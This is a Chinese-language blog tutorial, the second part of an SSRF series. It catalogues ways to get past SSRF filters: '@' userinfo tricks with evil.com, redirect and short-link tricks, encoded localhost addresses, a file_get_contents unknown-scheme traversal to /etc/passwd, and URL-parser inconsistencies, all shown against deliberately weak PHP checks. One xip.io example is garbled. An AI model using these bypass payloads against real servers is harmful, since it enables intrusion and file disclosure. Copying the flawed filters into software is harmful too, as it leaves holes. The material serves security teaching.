<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
    <meta name="description" content="一、简介SSRF的绕过，其实和具体的代码实现时密不可分的。比如有的代码会检查url !&#x3D; example.com，限制不能访问example.com，这种最简单的大小写即可绕过。 虽然绕过与代码实现有着紧密联系，但总结下来，对SSRF的限制大概有如下几种：  限制域名只能是xxx.com 限制不能访问内网IP 限制访问的端口只能是Web端口，只能使用http(s)协议  二、绕过下面来介绍SSRF">
<meta property="og:type" content="article">
<meta property="og:title" content="ssrf漏洞总结-承">
<meta property="og:url" content="https://vulnner.github.io/2022/01/02/ssrf%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93-%E6%89%BF/index.html">
<meta property="og:site_name" content="Vulnner">
<meta property="og:description" content="一、简介SSRF的绕过，其实和具体的代码实现时密不可分的。比如有的代码会检查url !&#x3D; example.com，限制不能访问example.com，这种最简单的大小写即可绕过。 虽然绕过与代码实现有着紧密联系，但总结下来，对SSRF的限制大概有如下几种：  限制域名只能是xxx.com 限制不能访问内网IP 限制访问的端口只能是Web端口，只能使用http(s)协议  二、绕过下面来介绍SSRF">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://vulnner.github.io/.io//image-20211108221023414.png">
<meta property="og:image" content="https://vulnner.github.io/.io//image-20211108224511621.png">
<meta property="og:image" content="https://vulnner.github.io/.io//image-20211108225523462.png">
<meta property="og:image" content="https://vulnner.github.io/.io//image-20211109215752183.png">
<meta property="og:image" content="https://vulnner.github.io/.io//image-20211109220429068.png">
<meta property="og:image" content="https://vulnner.github.io/.io//image-20211109222249877.png">
<meta property="og:image" content="https://vulnner.github.io/.io//image-20211109222224232.png">
<meta property="og:image" content="https://vulnner.github.io/.io//image-20211109222446462.png">
<meta property="og:image" content="https://vulnner.github.io/.io//image-20211109225815043.png">
<meta property="og:image" content="https://vulnner.github.io/.io//image-20211109230518582.png">
<meta property="og:image" content="https://vulnner.github.io/.io//image-20211109230952781.png">
<meta property="og:image" content="https://vulnner.github.io/.io//image-20211109231531310.png">
<meta property="article:published_time" content="2022-01-02T11:17:52.000Z">
<meta property="article:modified_time" content="2022-01-02T11:19:26.196Z">
<meta property="article:author" content="vulnner">
<meta property="article:tag" content="Web">
<meta property="article:tag" content="basic">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://vulnner.github.io/.io//image-20211108221023414.png">
    
    
        
          
              <link rel="shortcut icon" href="/images/favicon.ico">
          
        
        
          
            <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
          
        
        
          
            <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
          
        
    
    <!-- title -->
    <title>ssrf漏洞总结-承</title>
    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
      
<link rel="stylesheet" href="/css/rtl.css">

    
    <!-- rss -->
    
    
<meta name="generator" content="Hexo 5.4.0"><link rel="alternate" href="/atom.xml" title="Vulnner" type="application/atom+xml">
</head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/archives/">archives</a></li>
         
          <li><a href="/projects_url">Projects</a></li>
         
          <li><a href="/tags/">tags</a></li>
         
          <li><a href="/categories">categories</a></li>
        
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        
        <li><a class="icon" href="/2022/01/02/ssrf%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93-%E8%B5%B7/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://vulnner.github.io/2022/01/02/ssrf%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93-%E6%89%BF/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://vulnner.github.io/2022/01/02/ssrf%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93-%E6%89%BF/&text=ssrf漏洞总结-承"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://vulnner.github.io/2022/01/02/ssrf%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93-%E6%89%BF/&title=ssrf漏洞总结-承"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://vulnner.github.io/2022/01/02/ssrf%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93-%E6%89%BF/&is_video=false&description=ssrf漏洞总结-承"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=ssrf漏洞总结-承&body=Check out this article: https://vulnner.github.io/2022/01/02/ssrf%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93-%E6%89%BF/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://vulnner.github.io/2022/01/02/ssrf%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93-%E6%89%BF/&title=ssrf漏洞总结-承"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://vulnner.github.io/2022/01/02/ssrf%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93-%E6%89%BF/&title=ssrf漏洞总结-承"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://vulnner.github.io/2022/01/02/ssrf%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93-%E6%89%BF/&title=ssrf漏洞总结-承"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://vulnner.github.io/2022/01/02/ssrf%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93-%E6%89%BF/&title=ssrf漏洞总结-承"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://vulnner.github.io/2022/01/02/ssrf%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93-%E6%89%BF/&name=ssrf漏洞总结-承&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://vulnner.github.io/2022/01/02/ssrf%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93-%E6%89%BF/&t=ssrf漏洞总结-承"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%80%E3%80%81%E7%AE%80%E4%BB%8B"><span class="toc-number">1.</span> <span class="toc-text">一、简介</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BA%8C%E3%80%81%E7%BB%95%E8%BF%87"><span class="toc-number">2.</span> <span class="toc-text">二、绕过</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#2-1-%E5%9F%BA%E6%9C%AC%E7%BB%95%E8%BF%87"><span class="toc-number">2.1.</span> <span class="toc-text">2.1 基本绕过</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-2-%E5%88%A9%E7%94%A8%E4%B8%8D%E5%AD%98%E5%9C%A8scheme"><span class="toc-number">2.2.</span> <span class="toc-text">2.2 利用不存在scheme</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-3-%E5%88%A9%E7%94%A8%E4%B8%8D%E4%B8%80%E8%87%B4%E6%80%A7"><span class="toc-number">2.3.</span> <span class="toc-text">2.3 利用不一致性</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%B8%89%E3%80%81%E6%80%BB%E7%BB%93"><span class="toc-number">2.4.</span> <span class="toc-text">三、总结</span></a></li></ol></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        ssrf漏洞总结-承
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">Vulnner</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2022-01-02T11:17:52.000Z" itemprop="datePublished">2022-01-02</time>
        
      
    </div>


      

      
    <div class="article-tag">
        <i class="fas fa-tag"></i>
        <a class="tag-link-link" href="/tags/Web/" rel="tag">Web</a>, <a class="tag-link-link" href="/tags/basic/" rel="tag">basic</a>
    </div>


    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <h2 id="一、简介"><a href="#一、简介" class="headerlink" title="一、简介"></a>一、简介</h2><p>SSRF的绕过，其实和具体的代码实现时密不可分的。比如有的代码会检查<code>url != example.com</code>，限制不能访问<code>example.com</code>，这种最简单的大小写即可绕过。</p>
<p>虽然绕过与代码实现有着紧密联系，但总结下来，对SSRF的限制大概有如下几种：</p>
<ul>
<li>限制域名只能是xxx.com</li>
<li>限制不能访问内网IP</li>
<li>限制访问的端口只能是Web端口，只能使用http(s)协议</li>
</ul>
<h2 id="二、绕过"><a href="#二、绕过" class="headerlink" title="二、绕过"></a>二、绕过</h2><p>下面来介绍SSRF的各种绕过姿势。</p>
<h3 id="2-1-基本绕过"><a href="#2-1-基本绕过" class="headerlink" title="2.1 基本绕过"></a>2.1 基本绕过</h3><ol>
<li><p>利用基本身份认证绕过</p>
<p>服务端的验证代码可能是：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 检查url是否以http://www.xxx.com开头</span></span><br><span class="line"><span class="comment">// 这里限制只能访问baidu</span></span><br><span class="line"><span class="meta">&lt;?php</span>   </span><br><span class="line">    <span class="variable">$url</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;url&#x27;</span>];</span><br><span class="line">    <span class="keyword">if</span>(strpos(<span class="variable">$url</span>, <span class="string">&quot;http://www.baidu.com&quot;</span>) === <span class="number">0</span>)&#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&quot;ivalid url&quot;</span>;</span><br><span class="line">        <span class="keyword">return</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    file_get_contents(<span class="variable">$url</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>通过<code>ssrf?url=http://www.baidu.com@evil.com</code>即可绕过限制。</p>
<p>绕过原因在于，<code>www.baidu.com</code>被<code>file_get_contents()</code>当成了userinfo，<code>@</code>后面的<code>attakcer.com</code>才是真正的host。</p>
</li>
</ol>
<p><img src="/.io//image-20211108221023414.png" alt="image-20211108221023414"></p>
<ol start="2">
<li><p>利用重定向跳转</p>
<p>针对内网ip的限制，可以利用重定向跳转的方法来进行绕过。主要有两种：</p>
<ul>
<li><p>xip.io绕过</p>
<p>比如代码直接白名单验证是否是内网ip，但验证的有缺陷时。也可以用来绕WAF。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span>   </span><br><span class="line">    <span class="variable">$host</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;host&#x27;</span>];</span><br><span class="line">    <span class="keyword">if</span> (filter_var( <span class="variable">$host</span>,  FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE|FILTER_FLAG_NO_RES_RANGE)) &#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&#x27;禁止外网访问&#x27;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">echo</span> <span class="variable">$host</span>;  </span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>如果直接输入<code>?host=127.0.0.1</code>，则会显示禁止外网访问；</p>
<p>但若输入<code>?host=127.0.0.1</code>,则打印<code>$host</code>，成功绕过了内网验证的限制。</p>
<p>其中，<code>xip.io</code>是一个dns wildcard。它的大致原理如下：</p>
<img src="/.io//image-20211108224511621.png" alt="image-20211108224511621" style="zoom:60%;"></li>
<li><p>短链绕过</p>
<p>通过一些生成短链的网站，将内网地址缩短生成短链，可以用来绕WAF。</p>
<p>比如在一个短链网站，将<code>http://127.0.0.1/flag.php</code>缩短为<code>https://m1.fit/qy7yx</code>，就可以用这个来绕WAF。</p>
<img src="/.io//image-20211108225523462.png" alt="image-20211108225523462" style="zoom:67%;"></li>
</ul>
</li>
<li><p>进制转换</p>
<p>同样的，可以用不同的进制来代替正常的IP地址，进而绕过WAF。网上一搜就有很多脚本。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="variable">$ip</span> = <span class="string">&#x27;127.0.0.1&#x27;</span>;</span><br><span class="line"><span class="variable">$ip</span> = explode(<span class="string">&#x27;.&#x27;</span>,<span class="variable">$ip</span>);</span><br><span class="line"><span class="variable">$r</span> = (<span class="variable">$ip</span>[<span class="number">0</span>] &lt;&lt; <span class="number">24</span>) | (<span class="variable">$ip</span>[<span class="number">1</span>] &lt;&lt; <span class="number">16</span>) | (<span class="variable">$ip</span>[<span class="number">2</span>] &lt;&lt; <span class="number">8</span>) | <span class="variable">$ip</span>[<span class="number">3</span>] ;</span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$r</span> &lt; <span class="number">0</span>) &#123;</span><br><span class="line">    <span class="variable">$r</span> += <span class="number">4294967296</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">echo</span> <span class="string">&quot;dec:&quot;</span>;     <span class="comment">// 2130706433</span></span><br><span class="line"><span class="keyword">echo</span> <span class="variable">$r</span>;</span><br><span class="line"><span class="keyword">echo</span> <span class="string">&quot;oct:&quot;</span>;     <span class="comment">// 0177.0.0.1</span></span><br><span class="line"><span class="keyword">echo</span> decoct(<span class="variable">$r</span>);</span><br><span class="line"><span class="keyword">echo</span> <span class="string">&quot;hex:&quot;</span>;   <span class="comment">// 0x7f.0.0.1</span></span><br><span class="line"><span class="keyword">echo</span> dechex(<span class="variable">$r</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>还有一些其他指向本地的地址，可用来绕过<code>127.0.0.1</code>的黑名单限制：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">http://localhost/         </span><br><span class="line">http://<span class="number">0</span>/                 <span class="comment"># 0在window下代表0.0.0.0，在liunx下代表127.0.0.1</span></span><br><span class="line">http://<span class="number">0.0</span><span class="number">.0</span><span class="number">.0</span>/       <span class="comment"># 0.0.0.0这个IP地址表示整个网络，可以代表本机 ipv4 的所有地址</span></span><br><span class="line">http://[<span class="number">0</span>:<span class="number">0</span>:<span class="number">0</span>:<span class="number">0</span>:<span class="number">0</span>:ffff:<span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span>]/    <span class="comment"># liunx下可用</span></span><br><span class="line">http://[::]:<span class="number">80</span>/           <span class="comment"># liunx下可用</span></span><br><span class="line">http://<span class="number">127</span>。<span class="number">0</span>。<span class="number">0</span>。<span class="number">1</span>/       <span class="comment"># 用中文句号绕过</span></span><br><span class="line">http://<span class="number">127.1</span>/</span><br><span class="line">http://<span class="number">127.00000</span><span class="number">.00000</span><span class="number">.001</span>/ <span class="comment"># 多加一些0</span></span><br><span class="line">http://①②⑦.⓪.⓪.①		<span class="comment"># 编码绕过</span></span><br></pre></td></tr></table></figure></li>
</ol>
<h3 id="2-2-利用不存在scheme"><a href="#2-2-利用不存在scheme" class="headerlink" title="2.2 利用不存在scheme"></a>2.2 利用不存在scheme</h3><p>主要是用到了<code>file_get_contents()</code>函数，函数定义如下。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// filename为要读取的文件名，可以使url地址</span></span><br><span class="line"><span class="comment">// 会返回读取到的文件内容，string类型</span></span><br><span class="line">file_get_contents(</span><br><span class="line">    <span class="keyword">string</span> <span class="variable">$filename</span>,</span><br><span class="line">    <span class="keyword">bool</span> <span class="variable">$use_include_path</span> = <span class="literal">false</span>,</span><br><span class="line">    resource <span class="variable">$context</span> = ?,</span><br><span class="line">    <span class="keyword">int</span> <span class="variable">$offset</span> = <span class="number">0</span>,</span><br><span class="line">    <span class="keyword">int</span> <span class="variable">$length</span> = ?</span><br><span class="line">): <span class="keyword">string</span>|<span class="literal">false</span></span><br></pre></td></tr></table></figure>

<p>可以直接读取本地的文件内容：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="comment">// If strict types are enabled i.e. declare(strict_types=1);</span></span><br><span class="line"><span class="variable">$file</span> = file_get_contents(<span class="string">&#x27;./people.txt&#x27;</span>, <span class="literal">true</span>);</span><br><span class="line"><span class="comment">// Otherwise</span></span><br><span class="line"><span class="variable">$file</span> = file_get_contents(<span class="string">&#x27;./people.txt&#x27;</span>, FILE_USE_INCLUDE_PATH);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>也可以读取网页内容并返回：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="variable">$homepage</span> = file_get_contents(<span class="string">&#x27;http://www.example.com/&#x27;</span>);</span><br><span class="line"><span class="keyword">echo</span> <span class="variable">$homepage</span>;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p><code>file_get_contents()</code>有一个特性，它在遇到未知scheme时，会将这个scheme当做文件夹，进而造成任意文件读取的问题。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="keyword">if</span>(!preg_match(<span class="string">&#x27;/^https/is&#x27;</span>,<span class="variable">$_GET</span>[<span class="string">&#x27;url&#x27;</span>]))&#123;</span><br><span class="line">    <span class="keyword">die</span>(<span class="string">&quot;hack&quot;</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">echo</span> file_get_contents(<span class="variable">$_GET</span>[<span class="string">&#x27;url&#x27;</span>]);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>例如上面这段测试代码，限制了url必须以https开头，否则就<code>die</code>。</p>
<p>但根据<code>file_get_contens()</code>的特性，我们可以构造scheme为<code>httpsss://</code>。这个scheme对于该函数来讲，是未知的，所以就会被函数当做文件夹，再配合目录穿越，即可造成任意文件读取。</p>
<p>这种方法主要是在SSRF时，大多协议被禁止的情况下使用，比如可以用来读取服务端的一些源码/配置文件，进行进一步的漏洞审计。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ssrf.php?url=httpsss://../../../../../etc/passwd</span><br></pre></td></tr></table></figure>

<p><img src="/.io//image-20211109215752183.png" alt="image-20211109215752183"></p>
<h3 id="2-3-利用不一致性"><a href="#2-3-利用不一致性" class="headerlink" title="2.3 利用不一致性"></a>2.3 利用不一致性</h3><p>众所周知，许多安全问题的原因，在于对安全规范实现的不一致，SSRF的绕过亦如此。下面的内容主要参考了Orange在Blackhat上的演讲<code>《A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages》</code>。(Orange yyds)</p>
<p>即利用URL Parser和URL Requester解析不一致的问题，进行SSRF的绕过。</p>
<p>先来看一个简单的例子：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://1.1.1.1 &amp;@2.2.2.2# @3.3.3.3</span><br></pre></td></tr></table></figure>

<p>对这么一个URL，一些url parser库的解析结果是什么呢？</p>
<p>结果如下，可以看到它们解析的结果非常不一致。</p>
<img src="/.io//image-20211109220429068.png" alt="image-20211109220429068" style="zoom:50%;">

<ul>
<li><p>parse_url与readfile解析port差异</p>
<p>我们可以来看下面这段PHP代码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span>       <span class="variable">$url</span> = <span class="string">&#x27;http://&#x27;</span> . <span class="variable">$_GET</span>[<span class="string">&#x27;url&#x27;</span>];    <span class="variable">$parsed</span> = parse_url(<span class="variable">$url</span>);    <span class="keyword">if</span>(<span class="variable">$parsed</span>[<span class="string">&#x27;port&#x27;</span>] == <span class="number">80</span>) &#123;        readfile(<span class="variable">$url</span>);    &#125; <span class="keyword">else</span> &#123;        <span class="keyword">die</span>(<span class="string">&#x27;not pass&#x27;</span>);    &#125;<span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>它会校验端口是否是80，不是都话程序就go die。</p>
<p>在本机8000端口起一个web服务，正常情况下访问<code>127.0.0.1:8000/flag.txt</code>会显示<code>not pass</code>。</p>
<img src="/.io//image-20211109222249877.png" alt="image-20211109222249877" style="zoom:50%;">

<p>而访问<code>ssrf.php?url=127.0.0.1:8000:80</code>，发现成功访问到flag。</p>
<img src="/.io//image-20211109222224232.png" alt="image-20211109222224232" style="zoom:50%;">

<p>原因在于，<code>parse_url</code>和<code>readfile</code>对于<code>127.0.0.1:8000:80</code>的解析不一致。<code>parse_url</code>会把<code>80</code>解析为port，而<code>readfile</code>则是把<code>8000</code>解析为port，从而绕过了端口限制。</p>
<img src="/.io//image-20211109222446462.png" alt="image-20211109222446462" style="zoom:50%;"></li>
<li><p>解析host差异</p>
<p>这两个函数在解析host的时候也存在差异，同样可以利用这个特性来绕过对host的限制。</p>
<p><code>parse_url</code>解析到的host是<code>#@</code>之前的部分，而<code>readfile</code>解析到的则是<code>#@</code>之后的部分。</p>
<img src="/.io//image-20211109225815043.png" alt="image-20211109225815043" style="zoom:50%;">

<p>此外，<code>cURL</code>和<code>parse_url</code>对host的解析也存在差异。</p>
<img src="/.io//image-20211109230518582.png" alt="image-20211109230518582" style="zoom:50%;">

<p>利用这个特点，对类似下面的代码， 可以据此进行绕过。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span>       <span class="variable">$url</span> = <span class="string">&#x27;http://&#x27;</span> . <span class="variable">$_GET</span>[<span class="string">&#x27;url&#x27;</span>];    <span class="variable">$parsed</span> = parse_url(<span class="variable">$url</span>);	var_dump(<span class="variable">$parsed</span>[<span class="string">&#x27;host&#x27;</span>]);    <span class="keyword">if</span>(<span class="variable">$parsed</span>[<span class="string">&#x27;host&#x27;</span>] == <span class="string">&#x27;baidu.com&#x27;</span>) &#123;        <span class="comment">// readfile($url);         $curlobj = curl_init();          curl_setopt($curlobj, CURLOPT_POST, 0);         curl_setopt($curlobj,CURLOPT_URL,$link);         curl_setopt($curlobj, CURLOPT_RETURNTRANSFER, 1);          $result=curl_exec($curlobj);          curl_close($curlobj);          echo $result;    &#125; else &#123;        die(&#x27;not pass&#x27;);    &#125;<span class="meta">?&gt;</span></span></span><br></pre></td></tr></table></figure>

<p>直接访问非baidu的域名，会提示<code>not pass</code></p>
<img src="/.io//image-20211109230952781.png" alt="image-20211109230952781" style="zoom:50%;">

<p>利用解析的不一致性，访问<code>url=foo@127.0.0.1:8000@baidu.com/flag.txt</code>，<code>parse_url</code>会把<code>baidu.com</code>当做host，而cURL会把<code>127.0.0.1:8000</code>当做host。这样就绕过了限制。</p>
<img src="/.io//image-20211109231531310.png" alt="image-20211109231531310" style="zoom:50%;"></li>
</ul>
<h3 id="三、总结"><a href="#三、总结" class="headerlink" title="三、总结"></a>三、总结</h3><p><a target="_blank" rel="noopener" href="https://zhuanlan.zhihu.com/p/43348582">https://zhuanlan.zhihu.com/p/43348582</a></p>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/archives/">archives</a></li>
         
          <li><a href="/projects_url">Projects</a></li>
         
          <li><a href="/tags/">tags</a></li>
         
          <li><a href="/categories">categories</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%80%E3%80%81%E7%AE%80%E4%BB%8B"><span class="toc-number">1.</span> <span class="toc-text">一、简介</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BA%8C%E3%80%81%E7%BB%95%E8%BF%87"><span class="toc-number">2.</span> <span class="toc-text">二、绕过</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#2-1-%E5%9F%BA%E6%9C%AC%E7%BB%95%E8%BF%87"><span class="toc-number">2.1.</span> <span class="toc-text">2.1 基本绕过</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-2-%E5%88%A9%E7%94%A8%E4%B8%8D%E5%AD%98%E5%9C%A8scheme"><span class="toc-number">2.2.</span> <span class="toc-text">2.2 利用不存在scheme</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-3-%E5%88%A9%E7%94%A8%E4%B8%8D%E4%B8%80%E8%87%B4%E6%80%A7"><span class="toc-number">2.3.</span> <span class="toc-text">2.3 利用不一致性</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%B8%89%E3%80%81%E6%80%BB%E7%BB%93"><span class="toc-number">2.4.</span> <span class="toc-text">三、总结</span></a></li></ol></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://vulnner.github.io/2022/01/02/ssrf%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93-%E6%89%BF/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://vulnner.github.io/2022/01/02/ssrf%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93-%E6%89%BF/&text=ssrf漏洞总结-承"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
